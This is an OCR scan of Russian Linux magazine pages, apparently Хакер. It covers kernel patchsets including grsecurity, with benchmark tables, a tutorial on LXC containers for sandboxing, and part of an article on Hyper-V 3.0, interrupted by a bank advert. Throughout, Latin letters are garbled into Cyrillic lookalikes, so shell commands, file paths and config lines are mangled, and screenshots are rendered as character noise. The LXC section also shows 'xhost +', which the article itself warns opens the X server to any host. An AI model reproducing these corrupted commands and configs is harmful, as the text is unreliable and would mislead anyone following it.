/ргодес1:5/г1:/3.2/о1сІег/ра1:сІі-3.2-г1:1Ѳ.ра1:сІі.%2 
$ гсаі: раіісіі -3. 2- М:10. раіісіі. §2 | раіісіі -рі 

Разумеется, в твоем случае версия патча будет иной. 

В теписопЯд большинство интересующих нас опций находится 
в меню «Ргосеззог Іуре апсі Іеаіигез». Посмотри, что включена оп- 
ция «НідЬ Резоіиііоп Тітег Биррогі». В секции «Ргеетрііоп тобеі» 
добавилось два пункта — «РгеетрІіЫе кегпеі» и «РиІІу ргеетрІіЫе 
кегпеі». Полагаю, что последний необходим для встраиваемых 
систем. Если ты не разрабатываешь таковую, не думаю, что имеет 
смысл включать эту опцию. Идем в «Кегпеі Ьаскіпд», включаем 
опции отладки по вкусу. Выходим из теписопПд и компилируем, 
далее устанавливаем. 



6Р5ЕСІІКІТѴ 



(Згзесигііу ( ), похоже, один из самых древних среди 

живущих ныне патчсетов — появился он в уже далеком 2001 году 
и был построен на основе патчсета ОрепѵѵаІІ от легендарного Боіаг 
Оезідпег. У этого мамонта есть такие вещи, как РаХ — защита от 
переполнения буфера и РВАС — мандатная система контроля 
доступа, аналогичная БЕЫпих. На мой взгляд, стоит рассмотреть 
возможности патчсета подробнее. 

• Запретзаписи в/с!еѵ/тет,/сІеѵ/ктет и/сіеѵ/рогі (в случае с 
последним запрещается еще и чтение). Если выключить под- 
держку загружаемых модулей и привилегированный ввод/вывод 
через сисколлы іорегт/іоті, то легальным способом внедрить 
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ІЖІХОІО 



ь ™Тіж Итіл/ІМй Л Явгпиі Сопіциі *11оп 

Шішк» й»[||МГІ[ІВП 




Шчйгу РгйТгСГк№ ***> 

Но 1с Олей Леее-іі Сніігеі йрнепі — ■> 



?г«і«и№і — ' 

К^т и» I Аьй**|И[е 
ІМ4СЦВД1* РгйТ*еііфЛ* — - % 

Н«С»ЧГк РП№(І«І --■>» 
іурртп — > 
іеіііпр Орт. коп* 

Более тонкая настройка дгзесигііу 

вредоносный код в ядро будет невозможно. Но это также делает 
невозможным использование некоторых легальных программ. 

• «Империя наноситответныйудар» — если РаХвидитподозри- 
тельную активность, то вместо завершения одного процесса он 
либо вываливается в кегпеі рапіс (если процессзапущен отрута), 
либо завершает все процессы пользователя, от имени которого 
запущен этот процесс, и запрещает создание новых процессов с 
данным ІІЮ. 

• Ограничение доступа в каталог/ргос. Если точнее, то все про- 
граммы (кроме запущенных от я в но указа иного пользователя/ 
группы) будут видетьтолько процессы пользователя, отимени 
которого они работают. 

• Ограничения сГігооі. К ним относятся, например, запрет монтиро- 
вания внутри сЬгооІ, запретдвойногосЬгооІ, запрет ткпосі в нем... 

• ТРЕ — разрешение выполнения приложений, только если гооі — 
владелец каталога, и только он имеет доступ на чтение. 

• ТСР/ІЮРЫаскІіоІе — запрет отсылки пакета Р5Т/ІСМР, если на 
порту никто не слушает. Честно говоря, я не понял, чем это от- 
личается от"-) ОПОР" ірІаЫез. 

• А5І_К — рандомизируетстеки ядра, пользователя и базовые 
адреса, возвращаемые ттар(). 

Стабильная версия дгзесигііу для ядер третьей ветки имеет- 
ся только под 3.2. Качаем и патчим (опять-таки команды діі я не 
учитываю): 

$ м§е1: ІтЕ'Ер : / /ѵіѵіѵі . кегпеі . ог§/ риЬ/Ііп их/ кегпеі/ \ 
ѵ3.0/ра1:с)і-3.2.27.Ь22 
$ Ьгсаі: ра1=сІі-3.2.27.Ь22 | раіісіі -рі 
$ и§е1: Іі1:1:р://§п5есигі1:у.пе1:/5І:аЫе/ \ 

еп5есипі1=у-2. 9 Л-3. 2. 27-201208151951. раІісИ 
$ раіісіі -рі < ^Г5есипі1=ѵ-2. 9.1-3. 2. 27-2012081519 \ 

51 . раі ісИ 

Как видишь, патчсет требует текущей версии стабильного ядра, 
так что в твоем случае имена файлов будут другими. 

В теписопПд идем в «5есиш1у орііопз — > Огзесигііу» и включа- 
ем его. Выбираем «Сопіідигаііоп теіііосі — > АиІотаіЫс», а «ІІзаде 
Туре» — в зависимости от того, где будешь применять. В «Оеіаиіі 
ВресіаІ Огоирз» укажи ЗЮ, на который не будут распространять- 
ся ограничения на /ргос. Если хочешь гибкую настройку, иди 




Работа бенчмарка ЦшхВепсН 

в «Сизіотіге Сопіідигаііопз». Опций там много, а размер статьи 
ограничен, поэтому я их описывать не буду (как и утилиту дгабт, 
которая необходима для администрирования систем с дгзесигііу), 
лишь хочу предупредить, что на десктопной машине с иксами вы- 
ключать привилегированный ввод/вывод не рекомендуется. 

Компиляция потребует некоторых телодвижений — в дгзесигііу 
включены плагины для дсс, поэтому ставим соответствующий пакет: 

$ зисіо ар1і-§е1і іпзііаіі §сс-4.6-р1и§іп-сІеѵ 

и после этого уже запускаем компиляцию. 



ИТОГИ 



Полагаю, пришло время подводить итоги. На мой субъективный 
взгляд, патчсет 2еп кегпеі постепенно уходит в небытие. Почему 
я так думаю? Многие из доступных ранее патчей уже не под- 
держиваются и, соответственно, не включаются в Іеп кегпеі, 
взамен же ничего не добавляется. С рі-кегпеі ситуация другая. 
Автор патчсета старается добавлять новые патчи взамен старых. 
Функционал же этих двух патчсетов примерно одинаков — они 
оба рассчитаны на десктопные машины и, соответственно, их 
разработчики включают патчи, имеющие отношение к произво- 
дительности. Немного иная ситуация с гі-ргеетрі — он предна- 
значен для встраиваемых систем и для домашнего использова- 
ния не слишком пригоден. 

Особняком стоит дгзесигііу — ему, как я уже сказал, можно 
даже посвятить отдельную статью. Он не делает защиту абсолют- 
ной, но все же при правильной настройке патчсет значительно 
затрудняет взлом системы. □С 



Ядро 


.Іоііп ІНе Кіррег (РгееВ5й 
МР5), комбинаций вс. 


МР1ауег # сек 


32Ір,сек 


ІІпіхВепсЬ, 
общий счет 


Ядро ІІЬипЩ 12.04 


8307 


12,584 


38,105 


467,6 


2еп кегпеі 


7312 


14,876 


37,435 


509 


рі-кегпеі 


8284 


12,137 


38,590 


490,4 


гі-ргеетрі 


8198 


13,028 


38,989 


324,2 



ГАМШС 



С дгзесигііу при 
дефолтных на- 
стройках не рабо- 
тает Х.Огд, поэтому 
компилировать на 
десктопе не со- 
ветую. 



гш 

На прилагаемом 
к журналу диске 
лежат исходники 
ванильного ядра 
и описанные в 
статье патчсеты. 



Результаты проведенных тестов 
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Получать скидки 
в барах, ресторанах и 
магазинах твоего 
города 



Участвовать в акциях и посещать закрытые 
мероприятия для держателей «Мужской Карты» 



Управлять своими счетами, используя систему 
интернет-банка «Альфа-Клик» 



Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а также заказав по телефонам; 

8 [495} 788-88-78 в Москве 1 8 -800-2000-000 в регионах России {звонок бесплатный) 



Альфа 



\ѵѵѵш.тапсаг<±ги 



Генералы га я лицензия байка России на осущеі 



іііковских операции от 05.03.201: 










ІЖІХОІО 



Евгений Зобнин (ехесЬіІ.ги) 




ИСПОЛЬЗУЕМ 

І.ХС В КАЧЕСТВЕ 

ПЕСОЧНИЦЫ 

ДЛЯ ЭКСПЕРИМЕНТОВ 

Все мы время от времени экспериментируем 
со своей системой, проводим оптимизации, 
чистки, запускаем скрипты и программы 
сомнительного качества. Рано или поздно 
все это приводит к сбоям, исправить которые 
бывает непросто. Чтобы не попасть в такую 
ситуацию, можно использовать песочницы 
на основе технологии І_ХС. Они очень просты 
в развертывании и никак не мешают работе 
основной системы. 



ВВЕДЕНИЕ 



В Ыпих песочницы можно создавать разными способами. Есть про- 
веренный временем и оченьудобный в использовании ѴИиаІВох, 
с помощью которого можно получить внутри пингвина фактически 
любую ОС. Есть 0репѴ2, позволяющий создать изолированный 
контейнер с любым дистрибутивом, есть ОЕМІІ, легко скриптуемый 
и полностью свободный. Тем не менее каждый из них имеет свои 
недостатки: ѴИиаІВох и ОЕМІІ слишком сложны и неудобны для 
одноразовых тестовых запусков софта, 0репѴ2 требует установки 
кастомного ядра, другие средства изолирования, такие как сЬгооІ 
или ѴЗегѵег, либо слишком дырявы, либо уже не развиваются. 

К счастью, совсем недавно на сцене появилась система виртуали- 
зации І_ХС (Ыпих Сопіаіпегз), лишенная всех этих недостатков. 



ЧТО ЭТО ТАКОЕ? 



І_ХС реализует песочницу поверх ядра Ыпих, сходную по функцио- 
нальности с РгееВЗй баіі, Зоіагіз 2опез и 0репѴ2, не требуя при 
этом ни установки кастомного ядра, ни возни с образами дисков. 
Она основана на технологии ядра Ыпих под названием сдгоирз 
(появилась в версии 2.6.29) и пространствах имен, добавленных 
в ядро разработчиками 0репѴ2. С помощью І_ХС можно создать 
полностью виртуализированные Ыпих-окружения, у которых 
будет свой набор процессов, корневая файловая система, сетевой 
интерфейс, брандмауэр, файлы устройств и все, что нужно для 
работы. За счет использования сдгоирз количество выделенных 
для виртуального окружения ресурсов можно гибко регулировать, 
ограничивая «виртуальную машину» в потреблении памяти и про- 
цессорных ресурсов. 

Виртуальные окружения І_ХС очень легко создавать и контро- 
лировать. Дефолтовая конфигурация создается с помощью всего 
одной команды, настройка производится с помощью простого для 
чтения конфигурационного файла, корневая файловая система 
представляет собой обычный каталог, поэтому к нему всегда есть 
доступ из основной системы. І_ХС обладает большим количеством 
интересных и полезных возможностей, включая возможность 
одновременного запуска десятков и сотен виртуальных машин без 
вреда основной системе, клонирование виртуальных окружений 
и возможность запуска указанной команды внутри песочницы, что 
очень удобно для проверки софта и скриптов перед их применени- 
ем в основной системе. 



ХОЧУ! КАК? 



Все, что нужно для работы І_ХС, в ядре уже есть, поэтому нам оста- 
ется установить только утилиты управления окружениями, а также 
Ьгісіде-иіііз и пакет беЬооЫгар, используемый для развертывания 
окружений на базе ОеЫап и производных дистрибутивов вроде 
ІІЬипІи: 

# ар~Е-§е1: іпзііаіі Іхс сІеЬооІіБІігар ЬгісІ§е-и1:іІ5 

В дополнение к сІеЬооІзІгар можно также установить пакет 
ІюЬооЫгар, который позволит развернуть окружения на базе 
Ребога. Также, чтобы окружения смогли получить доступ в сеть, не- 
обходимо настроить виртуальный коммутатор. Сделать это можно 
с помощью командной строки: 
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В клетке 




С помощью конфигурационного файла мы можем указать, какие файлы устройств 
«прокинуть» в виртуальное окружение 

# і-Рсоп6§ е1:МѲ сіоып 

# Ьгсіі асІсІЬг ЬгѲ 

# Ьгсіі веІі-РсІ ЬгѲ 0 



Теперь подключаем к коммутатору физический сетевой интер- 
фейс (еіЬО): 

# Ьгсіі асІсІіТ ЬгѲ е1:МѲ 

# і-Рсоп6§ еіЬѲ 0.0. 0.0 ир 

И назначаем мостовому интерфейсу ІР-адрес, который раньше 
принадлежал еіЬО: 

# і-Рсоп6§ Ьг0 192.168.1.2/24 ир 

# гоиііе асісі сІе-РаиІі: 192.168.1.1 

Чтобы настройки применялись во время загрузки ОС, прописываем 
их в /еіс/пеіѵѵогк/іпіегі'асез: 

аиіо Іо 

і-Расе Іо іпеі: ІоорЬаск 



аиіо Ьп0 

і-Расе Ьг0 іпеі: Біаіііс 

# Внешний сетевой интерфейс 

ЬпісІ§е_рог1:5 еіЬѲ 
ЬпісІ§е_5І:р о-р-р 
ЬпісІ§е_-РсІ 0 

^ ІР-а дрес и п ро чие на стр ойки 

асИгезБ 192.168.1.2 
пеітазк 255.255.255.0 
пеімогк 192.168.1.0 
Ьгоасказі: 192.168.1.255 
§аіемау 192.168.1.1 

Если для настройки сети используется йНСР, последние пять 
строк следует удалить, а строку і-Расе Ьп0 іпеі: Біаііс заменить 
на і-Расе Ьп0 іпеі сІЬср. ЬХС также требует, чтобы виртуаль- 
ная файловая система сдгоир была смонтирована. В ІІЬипІи это 
происходит автоматически, в других дистрибутивах необходимо 
отредактировать /ек/ЫаЬ: 



Ш№* /-мйГ/НЬ/І^С/ПОгійВЁ/ГййІГі/Лйѵ/рІі ЙаГаиІІі В В 

гт^ір , гточс , пиулэ в в 

Попе вдГ* оііыііл в в 

поп» Ічріі бѵішііі В П 



Файл ЫаЬ контейнера в дефолтовом виде 




Все готово для запуска ЬХС-контейнеров 



# есЬо "с§гоир /зуБ/із/с^гоир с§гоир сіе-раиііз 0 0 > А 
/еіс/-р5І:аЬ 

# тоипі с§гоир 

Теперь запускаем команду Іхс-сЬесксопЛд, чтобы проверить, все 
ли готово для работы І_ХС: 

# 1хс-сЬесксопб§ 

Если все ОК и команда печатает на экране только строки, 
помеченные епаЫесІ (см. скриншот «Все готово для запуска І_ХС- 
контейнеров»), значит, можно приступить к созданию виртуаль- 
ных окружений (контейнеров). Делается это с помощью команды 
Іхс-сгеаіе, которой необходимо передать имя контейнера и исполь- 
зуемый шаблон. Последний, в терминологии І_ХС, представляет 
собой скрипт, автоматизирующий скачивание и развертывание 
окружения на базе того или иного дистрибутива. По умолчанию І_ХС 
поставляется с несколькими шаблонами, расположенными в ката- 
логе /изг/ІіЬ/Іхс/іетрІаІез/. Просто выбери тот, который нужен тебе, 
и укажи его в качестве аргумента ключа Ч‘ команды Іхс-сгеаіе, 
опустив префикс Іхс-. Например: 

# Іхс-сгеаіе -п посІеѲІ -і иЬипіи 

Здесь посІе0 1 — имя нашего контейнера, а иЬипІи — используе- 
мый шаблон. Некоторые шаблоны можно дополнительно конфигу- 
рировать перед развертыванием с помощью специальных опций, 
о которых можно узнать, указав флаг '--Ьеір'. 

# Іхс-сгеаіе -і иЬипіи --Ьеір 

После создания контейнера все принадлежащие ему файлы 
и конфиги появятся в каталоге /ѵаг/МЬ/Іхс/посІе0 1/. Корневая 
файловая система будет доступна в подкаталоге гооііб, точки 
монтирования и внешние файловые системы перечислены в фай- 
ле ЫаЬ (при запуске окружения І_ХС будет использовать его для 
монтирования ФС вместо /еІс/ІЧаЬ контейнера). Все конфигура- 
ционные опции будут перечислены в файле сопПд, который сле- 
дует открыть сразу после создания контейнера для выполнения 
первичной настройки. Добавляем в конец конфига следующие 
настройки: 

# Сетевое имя виртуальной машины (ЬоБіпате^ 

Іхс.иіБпате = посІеѲІ 

# Тип сети (ЕіЬегпеІ:') 

Іхс . пеіыогк.іуре ^ ѵеіЬ 

# Даем указание поднимать сетевой интерфейс при загрузке 
1хс.пе1:могк.Ла§5 = ир 

# Подключаем сетевой интерфейс к коммутатору Ьг0 

Іхс . пеімогк. Ііпк = Ьг0 
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ІЖІХОІО 



> ви±і ІХС-СГІОПВ -□ пагіеѲІ -п посіе02 

Тнеэкіпд согѵИдигэиол 
Соруіпд гооѢТб... 

Црйаипд гооІТз... 

’посіе&г 1 сгеаівгі 

> зисіо Іхс-сіопе -о побеѲІ -п посІеѲЭ 
Тиеакілд сопТІдигаіТап 

Соруіпд гоо№... 

ирйаііпд гооиз,.. 

‘ппгірВЭ' сгеэіегі 

> 



Клонируем контейнеры 

# ІР-алрес и маска сети 

Іхс . пе1:ыогк. ірѵ4 = 192.168.2.50/24 

Опционально можно также указать имя сетевого интерфейса 
и его МАС-адрес: 



3. Теперьпростоперезапускаем І_ХС, чтобы настройки вступили 
в силу и контейнеры запустились: 

# іпѵоке-пс.сі Іхс зіагЕ 

Если предполагается проводить жесткие эксперименты, в ре- 
зультате которых контейнер сможет сожрать всю память или весь 
процессор (пресловутая форк-бомба), окружение можно ограни- 
чить в ресурсах. Сделать это можно в режиме онлайн в отношении 
уже работающего контейнера: 

# 1хс-с§гоир -п посІеѲІ тетогу . 1іті1:_іп_Ьу1:е5 128М 

# 1хс-с§гоир -п посІеѲІ тсри.зііагез 1 512 

# Іхс-с^гоир -п посІеѲІ сризеіі.сриз 1 

Или с помощью конфигурационного файла, тогда лимиты будут 
включаться при запуске окружения: 

Іхс . с§гоир . тетогу . 1і ті~Е_ іп_ЬуЕе5 = 128М 
Іхс.с^гоир.сри.зііагез = 512 
Іхс. сдгоир. сризеіі.сриз = 1 



Іхс . пе1:ыогк. пате = е1;1і0 

Іхс . пе1:ыогк. быасісіг = ас:сІе:48:00:00:01 



Также сразу пропишем адрес РЫЗ-сервера в /еіс/гезоіѵ.сопі 1 
контейнера: 

# есііо патезегѵег 8. 8. 8. 8 > \ 

/ѵаг/1іЬ/1хс/посІе01/гоо1:-р5/е1:с/ге5ОІѵ. сопТ 

Этих настроек будет вполне достаточно для экспериментов. 
Теперь можно запустить виртуальную машину: 

# Іхс-зіагі: -п посІеѲІ 

Чтобы подключиться к консоли, используем такую команду: 

# Іхс-сопзоіе -п посІеѲІ 

Логин и пароль по умолчанию гооС С системой можно делать 
все что угодно: устанавливать и удалять пакеты, запускать по- 
дозрительные скрипты, причем это никак не повлияет на рабо- 
тоспособность основной системы. По окончании сеанса работы 
контейнер можно остановить: 



Первая строка здесь ограничивает количество памяти, выде- 
ленной для окружения, 128 мегабайтами, вторая — устанавливает 
ограничение на использование процессора, но только в том случае, 
если будет запущено еще одно виртуальное окружение либо ты 
самостоятельно создашь группу процессов с помощью сдгоир 
и установишь для нее свое значение сри.зЬагез (о том, как это 
сделать, можно прочитать в любой статье, посвященной механизму 
сдгоир). Общая логика работы системы в этом случае будеттакова, 
что каждая из групп процессов (виртуальных окружений) получит 
количество времени, пропорциональное значению сри.зЬагез. То 
есть если у одной группы сри.зЬагез будет установлен в 512, а у 
другой в 1024, то второе окружение получит в два раза больше про- 
цессорного времени, тотже эффект будет достигнут, если первая 
группа будет иметь значение 1, а вторая — 2. Другими словами, 
важна не величина значения, а лишь отношение значений друг 
к другу. Третья команда привязывает окружение ко второму про- 
цессорному ядру, но ты можешь перечислить и несколько ядер, 
указав, например, 0,3 (первое и четвертое). 

Кроме того, для полноты картины мы можем ограничить окру- 
жение в объеме используемого зѵѵар-пространства: 

Іхс . с§гоир. тетогу .тетзм. 1іті1:_іп_Ьу1:е5 128М 



# 1хс-з1:ор -п посІеѲІ 

А если он стал ненужным, удалить: 

# Іхс-сІезТгоу -п посІеѲІ 



тірзтискз 



В отличие от полноценных виртуальных машин, контейнеры очень 
неприхотливы в ресурсах, поэтому их почти безболезненно можно 
запускать при загрузке системы. В ІІЬипІи это делается так: 

1. Активируемавтозапускконтейнеров І_ХС призагрузке: 

# есбо К1НМ=уез >> /е1:с/сІеТаи11:/1хс 

2. Помещаем конфигурационныефайлызапускаемыхконтейнеров 
в каталог/еіс/іхс/аиіо/. Необязательно копировать их, можно 
просто создать символические ссылки: 

# 1п - 5"Р / ѵа г /НЬ/ Іхс /посІеѲІ/ сопб^ \ 

/е1:с/1хс/аи1:о/пос1еѲ1 



> |ѵ.Іг^н р, 

И -с И і л уШ 

иСіЫі 
НтіІіЖі 
МЕ1»П) 

-угІМЕГММ 
-^ІІЫЕ 1 І 4 ІЗ 
ІВДІЫІІ 

ііціжт 

-ѵПѵСШІ) 

*ІН- ^І-.и ІЕ-ИГ-'І— ЬиІІІ.Іг'И ЧЕ-МШ 

— 4 йЧцІ 4 НШ] 

НРІІИЯІ) 

-ПГІЩГ^Г?! 

-ІЕЩ.Іп[«Пгаі — 4ьвМ 
ЧіІЕНІІ 

-км і ц і№і*т** к * «и** 

— . р- ^ I ч I ГьЭТ-3 І 

-.Иіыгміті 
— Гочітьѵчя > (МяМ 

-ГМ|іЗі^М 1 ѴІ 1 > Т [Г 9 уі]і^ІМ<Е!і у 

І^ЕгчрІгѵрПМНЦік 

ЕІ.СіУЗ І и і Ч іІ І ПнЗІ-— Іні-ииг*щІрН1і1М*> 
!гі! ЬЛСЙ'— Ннѵ;*іІ |.М0 -)«ім.-ыв№іг4'Ш77> 

| идмс яні 

1 -мк-иІІ1ДЗ] 






Е 1.1 1 Н 1-1— нЛЯЕ і 

Е-кігіП 



Список процессов только что запущенного контейнера 
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В клетке 



А вот ограничить контейнер в дисковом пространстве не удастся, для 
этого придется использовать внешние инструменты, например квоты. 

В любой момент существующий контейнер можно клонировать, 
просто скопировав его каталог внутри /ѵаг/ІіЬ/Іхс/ в другое место и из- 
менив настройки и пути монтирования файловых систем. Например: 

# ссі /ѵаг/1іЬ/1хс 

# ср -а посІеѲІ посІе02 

# ѵі посІе02/{сс>п6§,-р5І:аЬ} 

В новых версиях І_ХС также доступна утилита Іхс-сіопе, которая 
делает все это автоматически, за исключением исправления ІР- 
адреса. Его придется изменить вручную через файл настроек. 

Еще одна интересная функция І_ХС — это возможность запуска 
приложения из основной системы внутри контейнера, что просто 
идеально подходит для экспериментов. Например, чтобы запустить 
команду /Ьіп/І5 внутри контейнера посІеОІ, достаточно выполнить 
команду: 

# 1хс-ехеси1:е -п посІеѲІ /Ьіп/Із 

Контейнер будет автоматически запущен, внутри него будет 
выполнена команда, и после ее завершения работа окружения 
завершится. Чтобы запустить команду самого контейнера внутри 
работающего контейнера, можно использовать команду Іхс-аМасЬ: 

# 1хс-а1:1:асІі -п посІеѲІ ХЬіп/Із 



хѵѵшоѵѵ 



По умолчанию І_ХС не позволит тебе использовать графические 
приложения внутри контейнеров, но этот недостаток довольно про- 
сто исправить, воспользовавшись Х-сервером ХерЬуг, способным 
работать внутри уже существующих иксов, и разрешив приложени- 
ям контейнера напрямую использовать сокет основного Х-сервера 
для коммуникации с ним. Все это делается в четыре простых шага: 

1. Редактируем файл ЫаЬ нужного окружения (например, /ѵаг/ІіЬ/ 
Іхс/посІеОІ/ЫаЬ), добавив в него следующую строку: 



СПИСОК ВСЕХ І-ХС-КОМАНД 



Іхс-аНасЬ — выполнить команду внутри работающего контейнера 
Іхс-сдгоир — изменить значения сдгоир-лимитов для контейнера 
Іхс-сНесксопПд — запуск проверки на совместимость системы с І_ХС 
Іхс-сіопе — клонировать указанный контейнер 
Іхс-соп50Іе — получить доступ к консоли контейнера 
Іхс-сгеаіе — создать контейнер 

Іхс-сіезігоу — удалить контейнер и все связанные с ним файлы 
Іхс-ехесиіе — запустить команду основной системы внутри 
контейнера 

Іхс-^гееге — заморозить контейнер 
Іхс-іпГо — информация о контейнере 

Іхс-кіІІ — аналог команды кіІІ для процессов внутри контейнера 
іхс-іб — аналог команды Із для файловой системы контейнера 
Іхс-топііог — мониторинг работы контейнеров в реальном времени 
Іхс-пе(5ІаІ — сетевая статистика для контейнера 
Іхс-рз — аналог рз для распечатки списка процессов контейнера 
Іхс-гевіагі — перезапустить контейнер 

Іхс-5е(сар — управление механизмом СараЬіІіІіеэ для контейнера 
Іхс-5ІагІ — запустить контейнер 
Іхс-5(ор — остановить контейнер 

Іхс-ипТгееге — возобновить работу замороженного контейнера 
Іхс-ѵегзіоп — печать версии І_ХС 

Іхс-ѵѵаіі — ожидать изменения состояния контейнера (для скриптов) 



/Хтд_ /ѵаг/НЬ/Іхс/посІеѲІ/гсюІі-Рз/Іітр попе го, ЬіпсІ 0 0 

Так мы дадим контейнеру прямой доступ к каталогу Дтр основ- 
ной системы, в котором как раз и хранится коммуникационный 
сокет иксов (в подкаталоге .XII). 

2. В основной системе выполняем следующую команду: 

$ хбозі: + 

Она откроет доступ к иксам любым приложениям с любых 
хостов, так что не забудь настроить брандмауэр, чтобы запре- 
тить все внешние коннекты к твоей машине, иначе кто угодно 
сможет запускать в твоих иксах приложения (что, в общем-то, 
не страшно и даже забавно). 

3. Запусти контейнер, установи в негоХерЬуг, атакже необходимый 
графический софт. 

4. ЗапустиХерЬуги следом нужную софтину: 

ОІ5РІ_АѴ= : 0 Хербуг :2 -зсгееп 1024x768 -сірі 96 
0І5РІ_АѴ=:2 х-Рсе-зеззіоп 



ХерЬуг создаст в иксах окно размером 1024 х 768, в котором 
будет запущена наша программа (в данном случае целое графиче- 
ское окружение Х(се). Ты можешь попробовать запустить приложе- 
ние и напрямую, без использования ХерЬуг, но в этом случае могут 
возникнуть проблемы с доступом к разделяемой памяти (ХерЬуг 
решает эту проблему явно, указывая софту, что не поддерживает 
работу через разделяемую память). 



выводы 



В этой небольшой статье мы рассмотрели многое из того, что мож- 
но сделать с помощью І_ХС. Это действительно простая технология, 
которая предоставляет облегченную форму виртуализации, позво- 
ляющую изолировать процессы и ресурсы, не прибегая к механиз- 
мам интерпретации команд, преобразованию системных вызовов 
и прочим сложностям полной виртуализации. ПЕ 



ИСТОРИЯ І_ХС 



Как и многие другие Ыпих-технологии, 
І_ХС появился в результате эволюционно- 
го развития ядра и базируется на тех- 
нологиях, которые были разработаны 
для других целей. Механизм сдгоирэ, 
используемый для ограничения групп 
процессов в ресурсах, изначально был 
разработан в 561 под названием сризеіз, 
затем был переписан инженерами боодіе 
и переименован. Технология изоляции, 
получившая имя патезрасез (про- 
странства имен) и предназначенная для 
отделения групп процессов от основной 
системы, была разработана ребята- 
ми из РагаІІеІз (разработчики 0репѴ2) 
и ІВМ. Позднее, когда стало очевидным, 
что в ядре І_іпих уже достаточно меха- 
низмов для реализации полноценной 
системы изоляции, родился проект І_ХС, 
который представляет собой всего лишь 
набор простых утилит и скриптов, ис- 
пользующих представленные возможно- 
сти ядра І_іпих. 



ІШД 

• Пользователи 
ЦЬипІи и йеЫап 
могут взять на 
вооружение утилиту 
арі-сасііег-пд — она 
будет кешировать 
все установленные 

в систему пакеты 
в собственном 
локальном 
репозитории, 
из которого их 
можно установить 
в контейнеры. 

• В любой момент 
контейнер можно 
заморозить, а затем 
вернуть кжизни 

с помощью двух 
команд: Іхс-Тгееге 
-п посІеѲІ; Іхс- 
ип-Ргееіе -п посІеѲІ. 
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нятен 

ючем. 
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Создание виртуального коммутатора с помощью мастера добавления ролей ѴѴіп2012 



НОВОЕ В НѴРЕР-Ѵ 3.0 



Вместе с новой версией серверной ОС ѴѴіпсІоѵѵз Зегѵег 2012 был 
представлен гипервизор Нурег-Ѵ 3.0, уже в бете превосходивший 
по всем возможностям своего предшественника. К окончательному 
релизу стало понятно, что М5 желает серьезно подвинуть своих 
конкурентов, предложив удобный инструмент для создания дина- 
мичных платформ, удовлетворяющих современным требованиям. 
Усовершенствований не просто много, а очень много. В первую 
очередь бросаются в глаза количественные изменения: гостевая 
ОС может иметь ОЗУ 1 Тб (ранее 64 Гб) и 64 виртуальных ѵСРІІ 
(ранее 4), хост-сервер — ОЗУ 4 Тб и 320 логических СРІІ, в Раііоѵег 
СІиз*ег можно объединить до 64 систем с 4000 работающими ѴМ 
(ранее 1000). Вероятно, не во всех случаях понадобятся такие мощ- 
ности, тем не менее задел создан неплохой. В списке официально 
поддерживаемых гостевых ОС значатся также Ыпих (РесІ На* / 
СепШБ, 51І5Е, ІІЬип*и) и РгееВЗО. 

Формат виртуальных дисков ѴНО, используемый в решениях 
виртуализации еще со времен ѴИиаІРС, поддерживает макси- 
мальный размер до 2 Тб, чего в современных условиях бывает 
недостаточно. В ѴѴіп2012 анонсирован новый открытый формат 
ѴНОХ, при котором максимальный размер диска увеличен до 64 Тб, 
а журнал снижает риск получить нечитаемый образ в случае 
сбоя. В ѴѴіпсІоѵѵз-версиях до 2012 поддерживались харды, кластер 
которых не превышает 2 Кб, теперь можно использовать жест- 
кие диски с размером сектора 4 Кб и поддерживающие стандарт 
эмуляции 51 2е. 

Формат ѴНОХ позволяет использовать технологию ОіТІоасІесІ 
Оа*а Тгап5*ег (ОйХ), аналогичную ѵ5*огаде АРІ *ог Аггау Іп*едга*іоп 
от ѴМѵѵаге. Обмен данными ускоряется за счеттого, что копирова- 
ние блоков идет внутри самой СХД, не нагружая 5АІ\І. Но для этого 
оборудование должно быть подключено к ѴМ как ѵігіиаі 5С5І или 
физический диск, ЮЕ не поддерживается. 

Как уже говорилось в статье «Кладовая данных», опубликован- 
ной в предыдущем номере ][, в ѴѴіп2012 очень многое сделано для 
обеспечения высокого уровня доступности сервисов. В частности, 
новая роль 5саІе-0и* Рііе Бегѵег позволяет хранить на сетевых ре- 
сурсах образы ѴМ, обеспечивая высокую доступность, прозрачное 
переподключение на другой сервер и живую миграцию. При работе 
в кластере Нурег-Ѵ, если один из хостов выходит из строя, вирту- 
альная машина автоматически перезапускается на другом хосте. 

С кластером все понятно, а как быть, если он не использует- 
ся? В Нурег-Ѵ 3.0 появилась технология Рерііса, позволяющая 
реплицировать файлы виртуальной машины на другой сервер и 
в случае сбоя быстро запустить ѴМ. Причем реализовано несколь- 
ко сценариев: наличие 5АІ\І, геораспределенная архитектура или 
локальная сеть. Схема работает просто: хосты связываются между 
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В Нурег-Ѵ поддерживается технология КШМА 



собой, синхронизируют копии ѴМ и затем обмениваются лишь 
измененными данными (ОеІ*а Реріісаііоп). То есть копия будет 
«отставать» не более чем на время между репликациями, которое 
настраивает сам админ (с учетом того, что состояние ОЗУ не пере- 
дается). Используется технология Ѵоіите ЗЬасІоѵѵ Сору (Ѵ55), 
поэтому реплики позволяют в том числе откатить состояние ѴМ. 

В Нурег-Ѵ Рерііса несколько компонентов: ядро РерІіса*іоп Епдіпе, 
модуль, отслеживающий операции чтения СЬапде Тгаскіпд, сете- 
вой модуль І\Іе*ѵѵогк Мобиіе, который обеспечивает безопасный 
НТТР/НТТР5-канал, и модули управления Мападетеп* Ехрегіепсе. 
При размещении ѴМ на кластерных узлах также используется 
роль НѴР Вгокег гоіе. 

Количество одновременных «живых миграций» сейчас 
ограничивается лишь возможностями сетевой подсистемы, при 
необходимости администратор может вручную задать очеред- 
ность, а ѴМ будут перенесены по мере освобождения ресурсов 
в выбранном порядке. Еще одно полезное нововведение — Ыѵе 
5*огаде Мідга*іоп позволяет выполнить миграцию хранилища без 
прерывания работы ОС и будет функционировать при отсутствии 
общего хранилища (Ыѵе Мідга*іоп ѴѴі*Ьои* ЗЬагесІ 5*огаде). Ранее 
в этой ситуации приходилось останавливать сервер, переносить 
его и запускать. Например, возможна живая миграция в случае 
переноса ѴМ с локальных дисков (и даже ІІ5В-накопителей) одного 
хоста на другой или локального диска на зЬагесІ з*огаде. Функция 
будет полезной для небольших компаний, использующих несколь- 
ко серверов без единой системы хранения данных. Достаточно 
просто указать, куда нужно переместить ѴМ, и пользователь даже 
не заметит, что работаетуже с другим сервером. Перенос возможен 
и на сервер с СРІІ, отличным оттекущего. Дедупликация данных 
позволяет сократить место, занимаемое ѴМ, без существенной по- 
тери производительности и уменьшить время на резервирование. 

